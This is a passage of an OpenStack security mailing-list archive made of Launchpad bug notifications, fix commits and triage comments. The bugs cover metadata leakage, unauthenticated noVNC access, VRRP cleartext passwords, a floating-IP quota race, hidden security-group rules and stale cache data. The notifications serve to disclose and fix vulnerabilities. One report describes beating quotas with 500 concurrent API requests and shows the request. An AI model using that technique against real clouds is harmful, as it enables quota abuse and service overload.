From 1841933 at bugs.launchpad.net Tue Feb 4 12:59:32 2020 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 04 Feb 2020 12:59:32 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <158082117212.26030.6666281751380080623.malone@soybean.canonical.com> Reviewed: https://review.opendev.org/679247 Committed: https://git.openstack.org/cgit/openstack/nova/commit/?id=31773715687326c92d4ad46ebb32b14645bbc614 Submitter: Zuul Branch: master commit 31773715687326c92d4ad46ebb32b14645bbc614 Author: Kobi Samoray Date: Tue Aug 27 13:49:05 2019 +0300 Avoid fetching metadata when no subnets found Metadata service uses the provider id to identify the requesting instance. However, when provider query doesn't find any networks, the request should fail. The same goes to the case where multiple ports are found. Closes-Bug: #1841933 Change-Id: I8ce3703ca86a3a0769edd42a790d82796d1071d7 ** Changed in: nova Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From 1668410 at bugs.launchpad.net Fri Feb 7 19:10:22 2020 From: 1668410 at bugs.launchpad.net (Brian Haley) Date: Fri, 07 Feb 2020 19:10:22 -0000 Subject: [Openstack-security] [Bug 1668410] Re: [SRU] Infinite loop trying to delete deleted HA router References: <20170227213540.6394.32961.malonedeb@wampee.canonical.com> Message-ID: <158110262705.9041.2439816882091696799.launchpad@chaenomeles.canonical.com> ** Changed in: neutron Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1668410 Title: [SRU] Infinite loop trying to delete deleted HA router Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive mitaka series: Fix Released Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Status in neutron package in Ubuntu: Invalid Status in neutron source package in Xenial: Fix Released Bug description: [Descriptoin] When deleting a router the logfile is filled up. See full log - http://paste.ubuntu.com/25429257/ I can see the error 'Error while deleting router c0dab368-5ac8-4996-88c9-f5d345a774a6' occured 3343386 times from _safe_router_removed() [1]: $ grep -r 'Error while deleting router c0dab368-5ac8-4996-88c9-f5d345a774a6' |wc -l 3343386 This _safe_router_removed() is invoked by L488 [2], if _safe_router_removed() goes wrong it will return False, then self._resync_router(update) [3] will make the code _safe_router_removed be run again and again. So we saw so many errors 'Error while deleting router XXXXX'. [1] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L361 [2] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L488 [3] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L457 [Test Case] That's because race condition between neutron server and L3 agent, after neutron server deletes HA interfaces the L3 agent may sync a HA router without HA interface info (just need to trigger L708[1] after deleting HA interfaces and before deleting HA router). If we delete HA router at this time, this problem will happen. So test case we design is as below: 1, First update fixed package, and restart neutron-server by 'sudo service neutron-server restart' 2, Create ha_router neutron router-create harouter --ha=True 3, Delete ports associated with ha_router before deleting ha_router neutron router-port-list harouter |grep 'HA port' |awk '{print $2}' |xargs -l neutron port-delete neutron router-port-list harouter 4, Update ha_router to trigger l3-agent to update ha_router info without ha_port into self.router_info neutron router-update harouter --description=test 5, Delete ha_router this time neutron router-delete harouter [1] https://github.com/openstack/neutron/blob/mitaka- eol/neutron/db/l3_hamode_db.py#L708 [Regression Potential] The fixed patch [1] for neutron-server will no longer return ha_router which is missing ha_ports, so L488 will no longer have chance to call _safe_router_removed() for a ha_router, so the problem has been fundamentally fixed by this patch and no regression potential. Besides, this fixed patch has been in mitaka-eol branch now, and neutron-server mitaka package is based on neutron-8.4.0, so we need to backport it to xenial and mitaka. $ git tag --contains 8c77ee6b20dd38cc0246e854711cb91cffe3a069 mitaka-eol [1] https://review.openstack.org/#/c/440799/2/neutron/db/l3_hamode_db.py [2] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L488 To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1668410/+subscriptions From 1666959 at bugs.launchpad.net Fri Feb 7 19:18:55 2020 From: 1666959 at bugs.launchpad.net (Brian Haley) Date: Fri, 07 Feb 2020 19:18:55 -0000 Subject: [Openstack-security] [Bug 1666959] Re: ha_vrrp_auth_type defaults to PASS which is insecure References: <20170222154900.3995.72774.malonedeb@chaenomeles.canonical.com> Message-ID: <158110313975.19098.6703802812206563899.launchpad@gac.canonical.com> ** Changed in: neutron Status: New => Won't Fix -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1666959 Title: ha_vrrp_auth_type defaults to PASS which is insecure Status in neutron: Won't Fix Status in OpenStack Security Advisory: Won't Fix Bug description: With l3_ha enabled, ha_vrrp_auth_type defaults to PASS authentication: https://github.com/openstack/neutron/blob/b90ec94dc3f83f63bdb505ace1e4c272435c494b/neutron/conf/agent/l3/ha.py#L28 which according to http://louwrentius.com/configuring-attacking-and- securing-vrrp-on-linux.html is totally insecure because the VRRP password is transmitted in the clear. I'm not sure if this is currently a serious issue, since if the VRRP network is untrusted, maybe there are already bigger problems. But I thought it was worth reporting, at least. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1666959/+subscriptions From 1447679 at bugs.launchpad.net Fri Feb 14 16:35:06 2020 From: 1447679 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 14 Feb 2020 16:35:06 -0000 Subject: [Openstack-security] [Bug 1447679] Related fix merged to nova-specs (master) References: <20150423154044.13260.70404.malonedeb@chaenomeles.canonical.com> Message-ID: <158169810643.30187.3066322959554537393.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/623120 Committed: https://git.openstack.org/cgit/openstack/nova-specs/commit/?id=33a13a1aabee9d89a88c3b7e3e18244b2bd6a0c1 Submitter: Zuul Branch: master commit 33a13a1aabee9d89a88c3b7e3e18244b2bd6a0c1 Author: pandatt Date: Thu Dec 6 10:31:58 2018 +0800 Proposal for a safer remote console with password authentication The feature aims at providing a safer remote console with password authentication. End users can set console password for their instances. Any user trying to access the password-encrypted console of instance will get a locked window from web console prompting for ``password`` input, and this provides almost the same experience as using VNC clients (e.g vncviewer) to access vnc servers that require password authentication. Blueprint: nova-support-webvnc-with-password-anthentication Related-bug: #1447679 Change-Id: I8416ceb88b9e9e6498a81c678944bc5d96700fc3 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1447679 Title: service No-VNC (port 6080) doesn't require authentication Status in OpenStack Compute (nova): Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Reported via private E-mail from Anass ANNOUR: I found that the service No-VNC (port 6080) doesn't require authentication, if you know the URL (ex: http://192.168.198.164:6080/vnc_auto.html?token=3640a3c8-ad10-45da-a523-18d3793ef8ec) you can access the machine from any other computer without any authentication before the token expires. (or in the same time as user still use the console) To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1447679/+subscriptions From fungi at yuggoth.org Mon Feb 17 20:36:09 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Mon, 17 Feb 2020 20:36:09 -0000 Subject: [Openstack-security] [Bug 1862050] Re: Race condition while allocating floating IPs References: <158092560419.18863.6467748917645068435.malonedeb@gac.canonical.com> Message-ID: <158197176924.29153.8477014513526065749.malone@chaenomeles.canonical.com> It seems like we've got reasonable consensus that this is expected behavior and have public documentation (at least in the Security Guide as linked above, but likely also elsewhere), indicating that OpenStack API servers on the whole do not make any attempt to mitigate excessively rapid calls to expensive methods and so should be protected by a separate filtering or throttling mechanism if they're deployed in an environment where they're at risk of being overloaded. I'll switch this public, treating as a class C1 report. If you or someone else feels this scenario should be covered by a CVE then feel free to request one from MITRE or another CNA, but please add it in a follow-up comment on this bug if you do so that we won't end up with multiple CVE assignments floating around for the same scenario. Thanks! ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - I work as a penetration tester, in one of the last projects our team encountered a problem in openstack, We are not sure whether to consider this an openstack security vulnerability. Hope you could clarify things for us. We were testing race condition vulnerabilities on resources that have a limit per project. For example floating IP number. The idea is to make backend server recieve a lot of same requests at the same moment, and because the server has to proccess all of them simultaneously we could get a situation where the limits are not checked properly. Sending 500 requests (each in individual thread) directly to the Neutron API for allocation floating IPs resulted in exceeding the IP limit by 4 times. Request example: POST /v2.0/floatingips HTTP/1.1 Host: ... X-Auth-Token: ... Content-Type: application/json Content-Length: 103 {     "floatingip": {         "floating_network_id": "..."     } } Is it a known openstack behavior or is it more like a hardware problem? ** Information type changed from Private Security to Public ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1862050 Title: Race condition while allocating floating IPs Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: I work as a penetration tester, in one of the last projects our team encountered a problem in openstack, We are not sure whether to consider this an openstack security vulnerability. Hope you could clarify things for us. We were testing race condition vulnerabilities on resources that have a limit per project. For example floating IP number. The idea is to make backend server recieve a lot of same requests at the same moment, and because the server has to proccess all of them simultaneously we could get a situation where the limits are not checked properly. Sending 500 requests (each in individual thread) directly to the Neutron API for allocation floating IPs resulted in exceeding the IP limit by 4 times. Request example: POST /v2.0/floatingips HTTP/1.1 Host: ... X-Auth-Token: ... Content-Type: application/json Content-Length: 103 {     "floatingip": {         "floating_network_id": "..."     } } Is it a known openstack behavior or is it more like a hardware problem? To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1862050/+subscriptions From 1824248 at bugs.launchpad.net Tue Feb 18 04:58:34 2020 From: 1824248 at bugs.launchpad.net (Sam Morrison) Date: Tue, 18 Feb 2020 04:58:34 -0000 Subject: [Openstack-security] [Bug 1824248] Re: Security Group filtering hides rules from user References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158200191491.31274.7179702981822222453.malone@wampee.canonical.com> Just a heads up that this causes a huge performance regression see lp:1863201 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Feb 18 06:31:39 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 18 Feb 2020 06:31:39 -0000 Subject: [Openstack-security] [Bug 1824248] Fix merged to neutron (stable/rocky) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158200749924.25068.4158280089578920577.malone@gac.canonical.com> Reviewed: https://review.opendev.org/688717 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=993a344559f293a225fe5dd59525e580249c652f Submitter: Zuul Branch: stable/rocky commit 993a344559f293a225fe5dd59525e580249c652f Author: Slawek Kaplonski Date: Thu Sep 12 22:02:52 2019 +0200 List SG rules which belongs to tenant's SG In case when user's security group contains rules created e.g. by admin, and such rules has got admin's tenant as tenant_id, owner of security group should be able to see those rules. Some time ago this was addressed for request: GET /v2.0/security-groups/ But it is also required to behave in same way for GET /v2.0/security-group-rules So this patch fixes this behaviour for listing of security group rules. To achieve that this patch also adds new policy rule: ADMIN_OWNER_OR_SG_OWNER which is similar to already existing ADMIN_OWNER_OR_NETWORK_OWNER used e.g. for listing or creating ports. Conflicts: neutron/conf/policies/security_group.py Change-Id: I09114712582d2d38d14cf1683b87a8ce3a8e8c3c Closes-Bug: #1824248 (cherry picked from commit b898d2e3c08b50e576ee849fbe8614c66f360c62) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Feb 18 11:18:44 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 18 Feb 2020 11:18:44 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 15.0.2 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158202472461.29423.1701781906471345390.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 15.0.2 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Feb 18 14:11:27 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 18 Feb 2020 14:11:27 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 14.1.0 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158203508793.30257.9718270552998979351.malone@wampee.canonical.com> This issue was fixed in the openstack/neutron 14.1.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Wed Feb 19 03:36:05 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 19 Feb 2020 03:36:05 -0000 Subject: [Openstack-security] [Bug 1824248] Fix merged to neutron (stable/queens) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158208336600.28723.16444215331086954227.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/688719 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=e00ebee05318edbd18f49df0fd34697d0e1417ed Submitter: Zuul Branch: stable/queens commit e00ebee05318edbd18f49df0fd34697d0e1417ed Author: Slawek Kaplonski Date: Thu Sep 12 22:02:52 2019 +0200 List SG rules which belongs to tenant's SG In case when user's security group contains rules created e.g. by admin, and such rules has got admin's tenant as tenant_id, owner of security group should be able to see those rules. Some time ago this was addressed for request: GET /v2.0/security-groups/ But it is also required to behave in same way for GET /v2.0/security-group-rules So this patch fixes this behaviour for listing of security group rules. To achieve that this patch also adds new policy rule: ADMIN_OWNER_OR_SG_OWNER which is similar to already existing ADMIN_OWNER_OR_NETWORK_OWNER used e.g. for listing or creating ports. Conflicts: etc/policy.json neutron/policy.py Change-Id: I09114712582d2d38d14cf1683b87a8ce3a8e8c3c Closes-Bug: #1824248 (cherry picked from commit b898d2e3c08b50e576ee849fbe8614c66f360c62) (cherry picked from commit 36d1086569627af5dafd734333a7ebc4bc060d77) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Fri Feb 21 16:41:59 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 21 Feb 2020 16:41:59 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 16.0.0.0b1 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158230332010.14972.17063049099665924256.malone@soybean.canonical.com> This issue was fixed in the openstack/neutron 16.0.0.0b1 development milestone. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1819957 at bugs.launchpad.net Mon Feb 24 17:11:03 2020 From: 1819957 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 24 Feb 2020 17:11:03 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <158256426338.24857.12969621347412596997.malone@gac.canonical.com> Reviewed: https://review.opendev.org/704508 Committed: https://git.openstack.org/cgit/openstack/oslo.cache/commit/?id=c31dd1aaac0a1dd8ca3f77b6da911ae85de6dc7a Submitter: Zuul Branch: stable/queens commit c31dd1aaac0a1dd8ca3f77b6da911ae85de6dc7a Author: Morgan Fainberg Date: Fri Mar 22 12:35:16 2019 -0700 Pass `flush_on_reconnect` to memcache pooled backend If a memcache server disappears and then reconnects when multiple memcache servers are used (specific to the python-memcached based backends) it is possible that the server will contain stale data. The default is now to supply the ``flush_on_reconnect`` optional argument to the backend. This means that when the service connects to a memcache server, it will flush all cached data in the server. The pooled backend is more likely to run into issues with this as it does not explicitly use a thread.local for the client. The non-pooled backend was not touched, it is not the recommended production use-case. See the help from python-memcached: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. Change-Id: I3e335261f749ad065e8abe972f4ac476d334e6b3 closes-bug: #1819957 (cherry picked from commit 1192f185a5fd2fa6177655f157146488a3de81d1) ** Tags added: in-stable-queens -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Invalid Status in keystonemiddleware: Triaged Status in oslo.cache: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: 